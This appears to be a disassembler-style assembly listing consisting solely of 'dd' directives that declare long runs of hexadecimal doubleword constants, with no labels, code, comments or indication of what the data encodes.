dd 0DD5D399h, 0CB286E3Eh, 97724915h, 0B2A0FFE7h, 37FDF2ACh
dd 0FBF18F5Fh, 0E654465Bh, 0AB712600h, 7F3543D3h, 4729068Fh
dd 0F2E68E76h, 0E1BFB123h, 0A8684E03h, 6A4BFBAAh, 4403D8BBh
dd 1CDE64D2h, 0AD89712Fh, 0A37B46EFh, 654C29EBh, 2FFCB2A7h
dd 0CB99F3Dh, 0BF846E2Eh, 7F752A04h, 7C3EC4B2h, 7E9D18Fh
dd 0EFDCA855h, 694514Bh, 0B05244B0h, 722400CEh, 2FF5E98Eh
dd 0EBA0996Fh, 0DB914620h, 9F5563CEh, 4C410DAFh, 607E9ABh
dd 0CCC845Bh, 0D085411Bh, 8453C9DFh, 473DCBCAh, 2BFC8297h
dd 0E8AA965Ch, 98975E1Eh, 7F613C26h, 6C14DAA4h, 28F2C66Dh
dd 0F3D570DAh, 0A0983E58h, 9C450A06h, 4709248Eh, 2404C897h
dd 0D4EC7A62h, 0CC74352Ch, 88574DBFh, 3C35BDAEh, 7FD8B86h
dd 0F4B14F57h, 9A0C7E13h, 74740DCFh, 3434E5C3h, 8F019976h
dd 0F9A89221h, 0A0873BFFh, 827403F1h, 5CFAD5B7h, 22D5B07Ch
dd 0B8B09E34h, 948751C6h, 91391DE6h, 440AEEACh, 8CD493Bh
dd 0C0BD5B46h, 9D6A1005h, 9B2919C7h, 2D25C9B5h, 0F0E88E68h
dd 0DFB0522Fh, 0CC574BF7h, 6448F85Ah, 2A02B5B0h, 12DF8671h
dd 0E29A8D0Eh, 0AA773EE9h, 5C5E4795h, 2F0CC490h, 0EBF9F4Eh
dd 9AA75C1Fh, 9B710344h, 7C1F81C6h, 3FF503A2h, 3D4BA4Fh
dd 0C0A24E34h, 0D06F16F6h, 5719E0DEh, 240CD25Ch, 0E0D97E8Ah
dd 0DC843492h, 6E6C2DF3h, 5434ECC3h, 180DE9A3h, 2DB3A567h
dd 0D7796917h, 677536E3h, 4439E3EBh, 3CE99782h, 0D9A6BC61h
dd 57A56513h, 7F520ED8h, 9014D2B7h, 2EDFC97Ah, 0E0C660DAh
dd 0AC6E4A2Ah, 75F006FEh, 65081EC2h, 7F4AC7Fh, 0DCAE6E54h
dd 0CC7B362Eh, 963F01EDh, 5D58F79Fh, 0E2888Ah, 0DDAD7553h
dd 0DB695907h, 89870DF4h, 3010D6CBh, 32D3A352h, 0CBAB8043h
dd 0B9773DE4h, 604006FBh, 6203D3C2h, 0F8DBB073h, 0E3DA5942h
dd 94814705h, 8C6FF6D6h, 5205E19Dh, 13CA4964h, 0F1A46673h
dd 967B261Bh, 7E2930D0h, 2D1BE29Eh, 0DAD0B3A6h, 0D925632h
dd 8B5949F7h, 772BFDA4h, 35E4C3BBh, 12CD847Dh, 0E68F913Dh
dd 6DE847EFh, 5A3225DAh
dd 3BFFB696h, 0F7CAA650h, 0DCAC6A2Fh, 9577221Bh, 6B0281CBh
dd 27F5CFC1h, 9E1AF4Fh, 0B7A56A3Ah, 0A65516EFh, 7D7CF6CCh
dd 1DE5D58Eh, 0DFD7886Fh, 0D19C3437h, 67473BE7h, 6A3A1AB5h
dd 25F0E89Fh, 0EFBB7F6Bh, 0DE9D4011h, 93662AEEh, 46D4F5CBh
dd 3CFFB09Eh, 6AB9C5Dh, 0BA884D0Fh, 70661301h, 6E00E5C1h
dd 32E4C183h, 0F0D67D49h, 0A0994630h, 0A24D1352h, 581B5DC0h
dd 2A68BD74h, 0D0CB7861h, 0C5991116h, 914A32F2h, 3B17DD9Fh
dd 2BF1B891h, 0F3AC6F53h, 0C1553D13h, 6D561EDEh, 303FE9CBh
dd 25D3B476h, 0D79B9238h, 0B3674DFFh, 435119F7h, 5C1CCFDBh
dd 7C9BB7Ch, 0CDC56955h, 99AD9507h, 854EF6D6h, 3B1FE1A3h
dd 19C5B75Fh, 0EC544652h, 0B16D351Ch, 4D3822C8h, 1524DA8Fh
dd 13E1917Fh, 10CA7523h, 5DAB26EEh, 7B2CED84h, 2211B796h
dd 12C38D91h, 0D4899833h, 96854B4Ah, 594105C1h, 6C09B689h
dd 1D9C8E66h, 0D489701Fh, 0B16D371Bh, 7C3DEDD3h, 5BCDC5B3h
dd 0EAE39E78h, 0B4AE694Bh, 0CC5D260Eh, 0CE7CEEC6h, 0BFCFEE03h
dd 0C3F47D87h, 0B3A5C992h, 3B52A0B2h, 4759DEB0h, 3EE1AF75h
dd 9B97A1CEh, 0EB82410Eh, 0E47FBCBh, 63E175ABh, 0D34CC472h
dd 2838F2D9h, 1307B92Ah, 186FB81Eh, 8F0DA2E7h, 3B6F809Eh
dd 3DCEA940h, 70507AA1h, 0FF6D2112h, 0FBBCE189h, 0F1899CAh
dd 73A46EC0h, 0AF76E5C9h, 0AB4289F5h, 375889A2h, 35929FF6h
dd 55A80158h, 0C50C3D07h, 67772AAAh, 80A04A31h, 3803F162h
dd 98F0A2C9h, 2EB569DAh, 0C8FBF1EAh, 7FF0F69Ah, 287119EDh
dd 0F7E8498Ah, 868FE6C5h, 0EC17A35Dh, 0AB1C2212h, 0CA84D807h
dd 0EF3C85B6h, 0DAF3C08Dh, 5BF995B3h, 0B87BC66Ah, 7B4475C5h
dd 5623F021h, 58147295h, 3E6D299Ah, 334882Eh, 8653D3FAh
dd 2F2958B9h, 34E8593Fh, 782B0946h, 2F3F464Dh, 82B125FEh
dd 664FE8B5h, 0B418821h, 1F5081B2h, 47713EBBh, 0CAC8B940h
dd 7981B29Fh, 0C040319Fh, 7B4DDEB2h, 147B9A6Bh, 0C3B45A72h
dd 464C6515h, 7B996963h, 73E6160Ah, 0B38CEA46h, 14205182h
dd 259BEA3Fh, 0E6EC9BAh, 0BDD69AB3h, 11E041B2h, 1B685DEBh
dd 1307B9D0h, 10FF1B22h, 0CF404B96h, 88778DDBh, 47B8A32Ch
dd 83DAE5FAh, 0C046640Fh, 0E9F5EA4h, 9E64AC05h, 0DF645AFBh
dd 0AFD73992h, 1BA34D7Eh, 0B088C91h, 7DE27A73h, 29470172h
dd 0DB0C3E6Ah, 18400331h, 0CB83B5E6h, 0AE03C49h, 0EC560095h
dd 29736E0Eh, 0C6B2806Bh, 0FAFBF055h, 7F73D022h, 0B7BE8D5Ah
dd 2A8A67F7h, 3CD0665Dh, 0E75B0D7Eh, 1385D486h, 0E54458Bh
dd 5EE644A5h, 9B320471h, 26813912h, 2DEA38A5h, 4F79D91Ah
dd 0CD41ED1Eh, 0BAD3BBh, 2C7355ABh, 0FF9A6747h, 8328E20Eh
dd 44615B52h, 0F3644BC8h, 5C9F3315h, 6B9CCDD6h, 3C59463Ah
dd 0E354506Fh, 2D061E39h, 2F0BBDAEh, 8EC8010Eh, 0D3049EEAh
dd 7D4F2A2h, 777CADDCh, 87B9ED82h, 53611456h, 7A302167h
dd 57E81A7Ah, 77A8DA0Eh, 9BE4AF76h, 0EF205186h, 2BA83F10h
dd 0DB05A8CDh, 96D4C50Bh, 0DB9BCE3Bh, 0CC4C7DAFh, 0A886633Bh
dd 936CF6FCh, 81403162h, 0D810E209h, 0C4E2A91Ah, 0D36B59A8h
dd 0C0EC0906h, 0D2F75D8Eh, 39487D3Eh, 37D506h, 0AFA0076Ah
dd 77DCD2C7h, 77446CCCh, 63FA196Dh, 0CD9B5260h, 0E8D0B299h
dd 947179EAh, 21B4EA26h, 5CA486FDh, 0FA812D1Eh, 0A1631BDEh
dd 0D2F9ED1Ah, 7FB0E216h, 252CF0A5h, 9237929Ah, 839465F6h
dd 0A17021B2h, 78F88229h, 0A399493Ah, 235487AEh, 57AC358Dh
dd 0A9E47259h, 0BE3739AAh, 0D30E7D1Bh, 4B3E8EE2h, 95AE6D1Eh
dd 42322ACFh, 4321E913h, 0B47904D2h, 0BBBCDDA3h, 85191C4Ah
dd 0B3A0A751h, 306319CDh, 0E79FCDFEh, 0A7D80A4Ah, 902A73F6h
dd 25D0C7A2h, 5C08BCEEh, 17C8F92Bh, 44911570h, 0BF22F2E4h
dd 5837EB97h, 0C56B7458h, 0AEB72698h, 0FF8632DCh, 123B531Fh
dd 3772C99Fh, 74BBDE46h, 0EF63D68Dh, 0A8E18DBEh, 6758C698h
dd 0A73C05CCh, 0F104172h, 0BD90C7Dh, 7C8879DCh, 93C4F522h
dd 0CF63B66Dh, 5C656D9Eh, 0C878A9DAh, 0CC6235E0h, 5C6D3004h
dd 7E2C5D8Eh, 5BBCA10Ch, 0C20D403h, 73E01142h, 4FCB229Eh
dd 0A44BA3F6h, 6394C572h, 0BFF00E9Fh, 0FC411D4Eh, 84541ECDh
dd 735811B1h, 1541AD77h, 0D7A44DC9h, 88893E0Eh, 3D44A8E0h
dd 571D10FDh, 0BB5FE410h, 76E2A95h, 226495E9h, 0DCC32360h
dd 0AB1C22EAh, 37C809A9h, 2C3C5566h, 9B90C1F2h, 7F2E14C9h
dd 0D724DA95h, 41240AF1h, 8FFDB122h, 54AB0312h, 0B52EAEE3h
dd 2BE565D6h, 0BF70A3D2h, 0AB768E5Fh, 0E5C48E85h, 80A955C6h
dd 2F20ACC1h, 1765E04Eh, 0F886390Bh, 8781B427h, 9E50C187h
dd 0C87FA1F2h, 9708CE26h, 5884F8AEh, 0F8086F5h, 7EBB76DFh
dd 56E4AF65h, 17B17797h, 0D18F4A5Fh, 994F30E9h, 505315BEh
dd 2207B9A0h, 0FCDFAD51h, 0D1795F2Ch, 9975FFEEh, 4937DEC5h
dd 2FF886AEh, 0F8BA9C4Ah, 0B8B4B918h, 7F611CF4h, 5B2FE0AAh
dd 0A23C6F9Eh, 4778A9CAh, 0AA825516h, 0D5450AEAh, 5A0BEFA7h
dd 1F09C56Bh, 0D7B4B34Fh, 0F2995F42h, 93486DB5h, 5130ECB3h
dd 309AB788h, 0BF9E4661h, 0EB3A0D1Fh, 3719499Fh, 73669500h
dd 46F6DE38h, 0A9DC6B17h, 0B386520Ch, 0EB219FEBh, 7FB0E112h
dd 47519E9Bh, 352899A7h, 73514C4Bh, 0DCC3D102h, 0AB1C22D2h
dd 13FB31BBh, 0AE465F82h, 9FBD1147h, 0AF70262Eh, 35DECE54h
dd 28576327h, 94F59437h, 8B7C03DEh, 96F6FFE1h, 88D1CBFBh
dd 0FF9F8B57h, 0EB295C0Eh, 21E85939h, 77BA1BFFh, 80874F8Ch
dd 965F2FFFh, 185596F9h, 0B314056Bh, 152681D8h, 68283219h
dd 0FB47F96Ah, 0C0002D8Ah, 0F3C99C9h, 894BADDEh, 147BE959h
dd 0C3B45ACEh, 461429BAh, 3B67B579h, 3557D90Ah, 627E485h
dd 67AD1082h, 535C4DF3h, 0EDBA52Bh, 0DAA3DB4Eh, 0E285400Dh
dd 834CBDBDh, 5788B9F1h, 658148DBh, 8BD22371h, 0A23CA95Ah
dd 785256Fh, 83BABD16h, 925B2152h, 6115EFBEh, 3729BF7Eh
dd 0BB110436h, 28E05157h, 0AB090103h, 9C6998BAh, 238C2573h
dd 0DD4D8A32h, 8C0C7D60h, 44ACEE65h, 3BF3B5A6h, 8FC0F126h
dd 0C321C2DBh, 7C6169DAh, 837EC123h, 0CD7A4912h, 7AC62CF9h
dd 0B70D800Fh, 0B6F4C4C6h, 0AFA5FAA7h, 18610D3Eh, 0E7D8469Dh
dd 24BA5966h, 0B75EC118h, 1BCCFD2Ch, 5D8AE25h, 53C17566h
dd 0C45E6618h, 0CBD1179Bh, 0C54EDB5Ah, 180F1A13h, 0EDBCA192h
dd 0AD7D8D5Eh, 0E5B48E85h, 0EA5C55C6h, 6F4A7D37h, 301913FEh
dd 0A7D84972h, 0E314418Eh, 561FD8B2h, 6DBBF8ADh, 0CBFCBD14h
dd 6771E466h, 824031B7h, 4B7CB4B6h, 4345761Ah, 1CF4653Eh
dd 0C141E1Fh, 6CD49D0Eh, 0CFAB783Ch, 0B3E41542h, 28D29A35h
dd 11A852F8h, 674C15BEh, 90489A41h, 9F8D41B2h, 1C2701A9h
dd 0AFF7B9EAh, 93C4F52Bh, 0B77EA6EFh, 90156D5Eh, 782A197h
dd 31AABD16h, 446FA06Dh, 0FBEC339Ah, 79E4A8CAh, 0F4A4D507h
dd 0AFE1A1AEh, 0EC44017Eh, 0CE5889BBh, 23A1316Bh, 0F0C8232h
dd 8B0C3D6Fh, 175EAD31h, 67F16494h, 0CC0B134h, 0D0A9569Eh
dd 727F102h, 0B7E194D6h, 0DAB0A1E7h, 24A1A0ECh, 0F72899A7h
dd 0B0E96E1Bh, 6F60EEEFh, 0B3695C8Eh, 641889ACh, 1ED084F6h
dd 0DA90C1F3h, 9B53F9EEh, 547B0925h, 1304827Fh, 17B536A4h
dd 0B5BDEDDEh, 61F9135Ah, 0FA15494h, 0C27061A4h, 0F7AFECB6h
dd 0B7E81A58h, 5091D2F5h
dd 4960D1BFh, 82EB7F0Eh, 0E7E20DCFh, 0EAD4CA76h, 1F507337h
dd 0D9413AEEh, 48C8B947h, 4D58CD5Eh, 7B58B07Dh, 817CADDEh
dd 73314F41h, 5047793Ah, 0FF70960Ah, 30F8EA4Bh, 78F9D9CAh
dd 0AA7AA21Eh, 0CBDCDCDDh, 33FCCECEh, 63B40D01h, 0AEDC6577h
dd 0F0865B6h, 1B4C82C6h, 855A9EEAh, 0A6FF5EEh, 8FED05D7h
dd 0F78F09Eh, 2772709Ch, 98357A93h, 0BF462112h, 0FB2C3EA6h
dd 9E17CBCAh, 0B36EE57Bh, 8B849E42h, 58CF0492h, 27189E92h
dd 6DACC938h, 0CFD06B72h, 48FF7041h, 17884FBAh, 8095BE5h
dd 8F000EC0h, 0CFA42D34h, 0D638699Ah, 53E19405h, 84B0A1E4h
dd 0BBEC1D4Ah, 0A49DA63Fh, 33A48B00h, 37555E8Fh, 0F1C30D7Eh
dd 35C94960h, 27C1F465h, 0E29001C4h, 0C23EFD56h, 4C8AC4FBh
dd 0D30EB33Bh, 617521E2h, 0ABCC42B8h, 0EEBE8142h, 1202C621h
dd 0EE5AAF1h, 612F80Fh, 2C1A0495h, 33EE1313h, 0AEBC44C2h
dd 1E1528F1h, 95D87EB5h, 58944536h, 1F1096C5h, 43B2D1EFh
dd 97C88E1Ah, 58CAB1h, 54C071E2h, 4B3CB59Bh, 0C6A9BD1Ah
dd 3E97EDBh, 0FF306192h, 80E9E3CEh, 77A81902h, 0AA76EB1Fh
dd 6F9D18DDh, 2B5C4DD3h, 0AC18C9FAh, 0A8D40974h, 35309078h
dd 3BAE9C49h, 0AB685F15h, 0B4611BFFh, 5BE00082h, 0EBD9CA77h
dd 0EA98984Eh, 0A591413Bh, 9C5C02E0h, 1B325A6Fh, 574879AAh
dd 0E0B3B541h, 0C17D3E2Fh, 7D3D349Eh, 82AEE9Eh, 0C2BFF3h
dd 0EBA2665Eh, 0AE7B620Ah, 6F2812D6h, 4C14E5C7h, 2BD29242h
dd 0DBB4927Eh, 0A8844CFFh, 239819F0h, 5511D5A1h, 1ACEB672h
dd 0ECFD3980h, 9F856CBCh, 8539F9E1h, 4FFD2DA1h, 8F46966h
dd 0C9B5A53Fh, 0B862E116h, 0BF3815D1h, 491BDF4Ah, 0FCD29BC6h
dd 0E29C5F47h, 9A9C263Eh, 0B14412BBh, 2BDF5F93h, 5FCD9377h
dd 9B896F2Fh, 0CB754803h, 5C32FBA6h, 42FCBFA7h, 12DBED29h
dd 87F96E27h, 8C34392Fh, 783CA1C1h, 7BADE28Bh, 0AA38D73h
dd 0BFA55186h, 9355207h, 1BB731E2h, 9752DD29h, 0D38E392Fh
dd 1EE1DBB7h, 355BDEF8h, 2ED4F237h, 0F3AFE77Eh, 0B977AA35h
dd 0CDF52A01h, 296C95D6h, 0FB6CB8E4h, 3FE23A98h, 1B4C7DAEh
dd 5788B9EAh, 93C4F526h, 0CF003162h, 0B3C6D9Eh, 4778A9DAh
dd 83B4E516h, 0BFF02152h, 0FB2C5D8Eh, 376899CAh, 73A4D506h
dd 0AFE01142h, 0EB1C4D7Eh, 275889BAh, 6394C5F6h, 9FD00132h
dd 0DB0C3D6Eh, 174879AAh, 5384B5E6h, 8FC0F122h, 2959B03Eh
dd 73829D3h, 3C1A4A55h, 76B0E1D2h, 40F8E0C1h, 0A61B5159h
dd 3639BFDh, 4B7C1589h, 3DE0CF55h, 0DFD66493h, 0E5DB9945h
dd 534EECE6h, 0B46672A7h, 548139AAh, 13045E3Ch, 91FFB6C9h
dd 0AC15CF36h, 3FF82D18h, 43525C1Bh, 3FCC09D2h, 9B94DD0Eh
dd 2CE8194Ah, 3302390Bh, 1749EAC2h, 0AB1BC972h, 4E23EB3Eh
dd 0A32DC3FBh, 0C8BB44B2h, 7D773AEDh, 0A767F96Ah, 5A1865B1h
dd 0BD8F4A2h, 0C005833Ch, 87F80B3Eh, 0EFF44FD5h, 25E8C97h
dd 81F18DFCh, 3D4F1146h, 1FE4FFC5h, 8A0E1086h, 1B8ADCBDh
dd 0EDB0062h, 8E962041h, 1F39EBFFh, 0E64BA5AEh, 0D4FBFCDEh
dd 9384DE94h, 9872B625h, 0B3C6D5Eh, 2B50A9DAh, 0EB4E516h
dd 7F19AFD7h, 0CA19758Eh, 3F803805h, 0F6A4D506h, 0EFC99FDFh
dd 0F3494D7Eh, 9F80643h, 0F77BC5B6h, 0A8428ECDh, 62CB3D2Eh
dd 5711EB2Fh, 0D9F12EE6h, 0A7C0B13Bh, 0CBFC2D5Dh, 82F7B2C9h
dd 43742545h, 0D488B312h, 0BE5F2CF8h, 0B7F1C31Fh, 0B60E98C6h
dd 66A0DDD8h, 0ABDD14C2h, 0F7DECC7Ah, 58D084B6h, 0DA90C1F2h
dd 31CF9ECh, 0BE8B5732h, 4CAAFAA5h, 8D7FB122h, 0BC467EEh
dd 0D0442953h, 2F564E16h, 904761D1h, 0FCAD9585h, 0FE0BD86Bh
dd 2FBDD631h, 3C60DD8Eh, 0B38376DAh, 9E1EE2B9h, 0E314FCF1h
dd 67D1E7B2h, 62BA9018h, 97C864AFh, 0D838B66h, 8A3D26A2h
dd 4DA39D94h, 0B8B7F3A1h, 79C2FD87h, 8C2FE0ADh, 3B2C6624h
dd 5FE85E77h, 2F60140Dh, 76205182h, 0EB552773h, 0B4F0F9FAh
dd 0A6A77440h, 1F39EBF7h, 0C5C9FCAEh, 5A8879E3h, 1673D92Ah
dd 0FAEF3322h, 0AE440399h, 273129E8h, 5FD0A645h, 0DBF44A56h
dd 36485967h, 0B881448Ah, 2E4FD4CDh, 30C2457Fh, 9159E565h
dd 0A862DD11h, 0C4AB8EFDh, 20E275CDh, 682AF395h, 98220D16h
dd 2BAD482Dh, 10C2A5F1h, 3257AC5h, 88223D89h, 2087EB5Dh
dd 0A2D533h, 0D81FEDF5h, 5E226DABh, 733D273Bh, 80B92C02h
dd 618F5C29h, 80040BF9h, 5A27F3D1h, 5B66C2B1h, 0E9D995F6h
dd 64805825h, 130459D7h, 37712944h, 27FCCF1Ch, 65D62B59h
dd 5B2EBFEDh, 865D1BFAh, 83EA60B9h, 0B47ECACDh, 0E0C96DAEh
dd 0B9E0501Dh, 0BBA3A0FDh, 78550B0Ah, 4D14055Ah, 7726A859h
dd 0B50C17B6h, 47B08E29h, 4049CD57h, 10A8B07Dh, 0C77CADDEh
dd 0D8ADBDE8h, 6E3A13F6h, 872DCCA4h, 0BB6C9DCEh, 0BAEB7B71h
dd 0DFB882C3h, 6C4B5142h, 2B9CA1EFh, 0E798C9FAh, 436408CAh
dd 0F08D38D8h, 1E4CBDA2h, 4E89B9EAh, 93C4ABAAh, 4A4DA962h
dd 76A345FAh, 30E24663h, 2B44E556h, 3CDBCCB8h, 0FBEC317Fh
dd 386899CAh, 0AC1A427Fh, 0EA8C1102h, 0B70DD271h, 2758897Ah
dd 22CC7F6h, 0ECFA0056h, 0B7678573h, 759F6731h, 3184B56Eh
dd 0DFBFA5C9h, 4827C72Bh, 7787DCBh, 4B74A5D6h, 77056E6Ah
dd 8AF6B24Eh, 0B7F42A0Fh, 336495C6h, 2C1F4906h, 0A8080D36h
dd 8F6DCC32h, 529720B6h, 9FBCF277h, 9BCC002Eh, 8704CD6Ah
dd 9EABCFFFh, 0F694767h, 76FF681Eh, 0EB30B222h, 0EF45EA29h
dd 3F6FA192h, 0B298DD0Eh, 1E8440C2h, 8979CE98h, 8A60D1DBh
dd 0A9CCDA6h, 2060B41Eh, 4E144558h, 0E6B23E5Ah, 0C3AC0D19h
dd 7E4B15F5h, 8B9E1EC5h, 6A5A867Dh, 0B803486Fh, 87F8FD4Bh
dd 853FF7E9h, 0FF306191h, 0AAD49103h, 27AB7844h, 0A74D2D31h
dd 37BA10DDh, 967682A9h, 1E0F748Bh, 9C468AADh, 972741B2h
dd 6A40B527h, 97548A6Fh, 93C4F926h, 170EE562h, 0D36E2DB7h
dd 87704181h, 0FB5BE92Ah, 9EC799E7h, 0CA974E5h, 2F68D9BEh
dd 0E0A4D506h, 86459108h, 0EB1C0DB2h, 0E0CAAEh, 6D5DDEDEh
dd 0DFFC2C97h, 0DEE8FD6Eh, 431FDEB0h, 3EBB5A6h, 0C365BB3h
dd 0CBBC4179h, 178F940h, 8380C05Bh, 70A8B12h, 38572AECh
dd 0F7E82D7Bh, 336495B6h, 0A810D8D6h, 3854F3D4h, 57AFAFF6h
dd 63631FCEh, 0E1354A59h, 0EACC3D17h, 17D40AEFh, 134455A6h
dd 9F7966E2h, 7439E7E6h, 21F8E98Eh, 0C3B50DB8h, 4BA126E5h
dd 7B6CDD4Eh, 0BA74194Ah, 0FD0C9906h, 6F4C7A67h, 0F403B3FEh
dd 0E7E18FF7h, 60DFE076h, 1F10B583h, 1B8CBDEEh, 0E718025Fh
dd 0FFEDBA64h, 1E9671E2h, 8B68BE63h, 87B8691Ah, 33FB9A56h
dd 19AD6BEAh, 0E56C5DC2h, 1F42B631h, 306F1D57h, 0EFE04593h
dd 2B5C8EBEh, 4028CBEEh, 8FFAAA2Ch, 0BB5041B2h, 45E977ADh
dd 0B58879DEh, 141C1BBDh, 0A07D6832h, 0B3CADD2h, 0F478A9D8h
dd 8DFC9914h, 7F1C4BB7h, 84D3038Eh, 0F731FB47h, 8F783D06h
dd 3E371142h, 0AB085E03h, 275891BAh, 92F8B9F6h, 0DFFC32B7h
dd 0DB083D6Eh, 0C73F0EAAh, 7E01AF6Eh, 0E9C0B136h, 48276AB5h
dd 7787DCBh, 43749DD6h, 70AF2A7h, 58F23DCDh, 0F7E82D71h
dd 0F333F028h, 8DAD7CA8h, 0B5F426E6h, 2724741Fh, 2630C5B6h
dd 6BA766F8h, 4626FDEEh, 3D9BE1Dh, 23447566h, 979AB1E2h
dd 8E68AD9Fh, 0C1F06DDAh, 434080FBh, 360787D2h, 87CF6280h
dd 263F190Ah, 33F0460Bh
dd 2F6091C2h, 0BBA5A13Eh, 80550B0Ah, 4D14054Ah, 2B810645h
dd 7B8CBDAEh, 1518F92Ah, 0CF00373Bh, 89E2402Fh, 8B68C683h
dd 12D721Ah, 0E1F4651Fh, 0FC14E1F9h, 3B1CA403h, 37AB288Ah
dd 0E4614CDCh, 0EF209196h, 0C95C8DFEh, 94A92FB2h, 41FDB934h
dd 0D918F1D9h, 0DB785833h, 5A28F9EAh, 24C65BCh, 8FEC22E7h
dd 0BBC6D9Eh, 0B7767EDAh, 6C515F98h, 9DF0E126h, 0F8A0DDE5h
dd 37B8A07Fh, 0B3379486h, 805DC8E8h, 0EB1C0DB2h, 54588ABAh
dd 6DD475EDh, 0DFFC2AB7h, 0E2F3976Eh, 0D7C7D1CCh, 7F6D1ADCh
dd 0EADAF162h, 5A622E0Eh, 0C7447A1Fh, 4574A5D6h, 0CEC3D612h
dd 0FB18EED3h, 0F328598Ah, 0E35A4AC6h, 4A1DDB42h, 35DCCD72h
dd 2724591Fh, 3334C6B6h, 0E06A7914h, 6CC4D85h, 0D1488972h
dd 0D310502Bh, 0CC2B1BE2h, 8B7C014Fh, 0C7F0295Ah, 7B0E75ABh
dd 0DC660951h, 7B6CB1E4h, 0B83884ECh, 3B744D5Dh, 0FB3616C8h
dd 7A02CD3Eh, 0E7E41ABFh, 0F3144576h, 6C3D32B2h, 0DE44E3D3h
dd 0B12503E2h, 0B104757Ah, 69006449h, 24023AF7h, 483E95Ah
dd 0C3B45927h, 0FF506192h, 8A1D8C03h, 1F42D431h, 50EA1D3Fh
dd 0EFE045A8h, 355BF17Eh, 0A7A4F39Fh, 8C7BEB36h, 1F39CBCFh
dd 0A50DF7AEh, 9751434Fh, 432B1B26h, 0A87D339Ah, 753CADD2h
dd 33892ECDh, 83B3E556h, 3BE32252h, 0FB2C5D11h, 0B204C042h
dd 0A4295028h, 30E05156h, 0EB1C4D6Fh, 279960B8h, 1093C5F6h
dd 0FBABB937h, 73B31BF1h, 174879AAh, 511110C8h, 0AC376984h
dd 0E774C840h, 6232F8FDh, 0AE4E65A5h, 8BE16625h, 0BBEC1D8Eh
dd 0B7B55A8Ah, 5F351A99h, 6FA0D1C2h, 8908053Eh, 0FB8DE15Ch
dd 0F650AC9h, 5F90C132h, 8CFFF2Eh, 35A9432Bh, 8DF93Dh
dd 2BE857EAh, 36235322h, 21F0B969h, 7B0E632Dh, 0BC6E7E8Ah
dd 7B6CB1E5h, 0BAFF84ECh, 0E28A8E16h, 6F4C8247h, 6B9CCDFEh
dd 17F85DBAh, 0CC915F79h, 0E050C186h, 0E491A70Eh, 99C8DD32h
dd 93D00E0Bh, 12DCB1A2h, 0B678715Eh, 254ECACAh, 0CD54149Eh
dd 0BF5C8AF7h, 0A1343CEh, 3774AA8Fh, 0B3E4F546h, 7EEF8582h
dd 0EB489E43h, 6798C9FAh, 0D2D9F916h, 0DF104435h, 0AB4991AEh
dd 4A1F237Ah, 184BBC9Dh, 0CF402AE0h, 4CC52EB5h, 41A039D6h
dd 0C3C0FE9Bh, 3CDBCB52h, 0FBEC317Fh, 372899CAh, 2BBED15Ah
dd 2CD6D4F2h, 0EB5C6197h, 8F329321h, 0C09A2501h, 9F90351Bh
dd 58F79810h, 17884D9Bh, 5484B5E5h, 0C6BA476h, 0CBBC418Fh
dd 0E738699Ah, 2BFA2EAh, 7FB0E111h, 2B9C2282h, 723704F0h
dd 0CDE11081h, 4AA0111Bh, 0BF2486F6h, 646312A9h, 2394B987h
dd 5F10C1F2h, 1851FBE3h, 0D7480D53h, 93046D1Ch, 57AFB4BBh
dd 0C701F19Bh, 8F8197Eh, 8EC45D36h, 1D6A0439h, 0D9ECAE76h
dd 2E303FB1h, 0F37CED06h, 0D05E91C2h, 0D6F46860h, 0A5A5D2BFh
dd 2325ED18h, 0E2002CD4h, 6F093A44h, 86C8B91Eh, 93D026EBh
dd 0F4071A2h, 7A7602EEh, 0A2E04141h, 0ABA3A03Fh, 2F47D979h
dd 540A1A45h, 4A9D9CAh, 0B324FEC4h, 2B974A83h, 80E591E2h
dd 6758B9E7h, 9C4EB2ADh, 5C2741B2h, 1B8C462Ch, 83593E9Dh
dd 9384F5E6h, 0D12C3162h, 0CDA31511h, 16A2A9DEh, 7C569295h
dd 0B6F02112h, 0FB2D8612h, 375D41CAh, 0B0EBD506h, 0E39D5FF0h
dd 0A7FE5FADh, 0CE58D586h, 23A13D6Bh, 254D8A32h, 8E0C7D57h
dd 1A0C3131h, 7B13640Eh, 0A7ACB4A9h, 622F03CAh, 0F0D2DE21h
dd 462BA516h, 0FC29EDD0h, 0BBACE60Ch, 70209B89h, 733DDB4Bh
dd 474F5C02h, 0AB5CA029h, 0B470497Ah, 0AE27F4C8h, 9FB9674Fh
dd 0E4B4332Eh, 528B581Ch, 0D31DDB1Bh, 47B63CE2h, 76C0271Dh
dd 0C4D1AC24h, 414DD91h, 0BB63A1D2h, 7BACDE54h, 0E03E6E49h
dd 0A02355C6h, 2F208A90h, 7244D99Ah, 0A7D8ABBFh, 0DF4EC276h
dd 283E0699h, 598BBDAEh, 8542217Ah, 8883E4B1h, 0F806A44h
dd 268302DEh, 0AABF55Dh, 0C3F4263Dh, 6C596DB9h, 3B2C6630h
dd 789D5E15h, 30E31546h, 0EFE04A50h, 42540E20h, 0B15D81Fh
dd 2ED40536h, 222743B2h, 0E434ADA2h, 800BD89Ch, 539D5BB3h
dd 0EB7D4062h, 0E3C6D9Eh, 781535Fh, 0B531E816h, 3AF0E12Bh
dd 0FFE7388Eh, 379D1BD5h, 0B27BD506h, 6B5F204Ah, 6E1C4D7Eh
dd 66578BFAh, 1511C8EAh, 0D1D0410Bh, 71B9CC3Eh, 0FE4839A3h
dd 1351ED5Bh, 0CF3DCB22h, 0CB67B259h, 8B11699Ah, 3774A5D6h
dd 0EB2DF02Dh, 3BEC1D4Eh, 741B4E84h, 3364953Dh, 4AA11789h
dd 0D32C217Dh, 8E5B1ED2h, 1CEE327Fh, 0AE7DC132h, 0B472822Dh
dd 540739AAh, 13045E74h, 1836366Bh, 8B43EDDEh, 0B0B6AE91h
dd 0B0265D6h, 482A26A9h, 0E49ADD4Eh, 0B7E81947h, 0DBEF07D6h
dd 2F6091BDh, 0F6508B7Bh, 0AAD6347Bh, 602B5534h, 1F10BA78h
dd 970BB9A3h, 0E99183Ah, 0B4F8192Ah, 86FF8C89h, 8B751F63h
dd 0F42FC91Ah, 0C3B44E64h, 461A57BAh, 3B153E79h, 6428D90Ah
dd 0B71FF040h, 2E075A50h, 0FFDA8CB6h, 0A0DBA875h, 0D9628A31h
dd 0E387400Dh, 2CE7FE92h, 3E88B9CEh, 0FE57A471h, 0AB36B27Eh
dd 0AB3C6D7Eh, 0C238BC24h, 2F0912h, 0BF305ABCh, 1759A60Bh
dd 0B46799CAh, 73E4BE54h, 0E53D7624h, 0AD1B9395h, 1B16B4CEh
dd 8B6B8B38h, 9F9E82F5h, 0DB093D6Eh, 55C179AAh, 96360432h
